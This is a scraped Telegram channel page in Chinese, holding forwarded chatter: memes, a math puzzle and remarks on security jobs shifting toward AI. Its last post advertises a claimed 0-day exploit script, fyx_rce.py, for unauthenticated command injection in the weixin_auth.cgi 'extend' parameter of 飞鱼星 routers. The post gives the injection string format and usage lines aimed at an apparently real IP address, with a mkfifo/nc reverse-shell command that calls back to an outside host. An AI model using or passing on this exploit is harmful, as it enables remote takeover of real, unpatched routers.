<NullPointerException> 二周目
892 subscribers
1.67K photos
60 videos
52 files
598 links
得不到的永远在骚动,被偏爱的都有恃无恐。
这里是 Sh1zuku /ɕizɨkɯ̟/。
Download Telegram
Forwarded from 一个军盲
辽宁舰 J-35 模型

泄密就在一瞬间🤕
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👎2
群u推点中转站()
Forwarded from 每日沙雕墙 (投稿机器人 2.0)
via my nbkls
Forwarded from quick paster (baka)
为防止水群太多智力减退,请完成以下数学题:
一组小朋友在一起玩耍,他们人数不止2个人,但分成每两人一组之后没有多余的人。请证明可以把他们分成两个神奇的小组,每组的人数都无法分成人数相等的多人小组。
Forwarded from 橘橘橘子汁 & 🍊
我不行了 你们都这么写路由的吗
Forwarded from 巽紺
秋招相比暑期实习,最大的感受是传统的岗位快要没了,大家都在往AI上靠。腾讯之前的安全技术,今天更新简历时发现被加上了AI
但是AI怎么做,究竟可以做到哪一步,我相信各个厂都还没完全弄清楚...
喜提edumail
👏8👎1🎉1
- 你这文件上传修了吗
- 如修
一脚油门直接飞出去了()
Forwarded from nyarvex
fyx_rce.py
6.2 KB
(0-day)飞鱼星路由器 weixin_auth.cgi 命令注入 - 逐字符写入工具
用法:
python3 fyx_rce.py <目标URL> [要写入的命令]
示例:
python3 fyx_rce.py http://222.88.213.2:8081 "mkfifo /tmp/f;cat /tmp/f|sh|nc 1.2.3.4 6666>/tmp/f"
python3 fyx_rce.py http://222.88.213.2:8081 # 使用默认反弹shell命令

利用飞鱼星路由器 weixin_auth.cgi 接口中一个未经授权的远程命令注入漏洞(RCE),漏洞位于 /weixin_auth.cgi 的 extend 参数。CGI脚本在处理该参数时,未对用户输入进行过滤,直接将参数值拼接到系统shell命令中执行。构造 extend=volanswechatconnwifi';<注入命令>;',利用分号(;)闭合前面的正常语句,即可插入任意系统命令。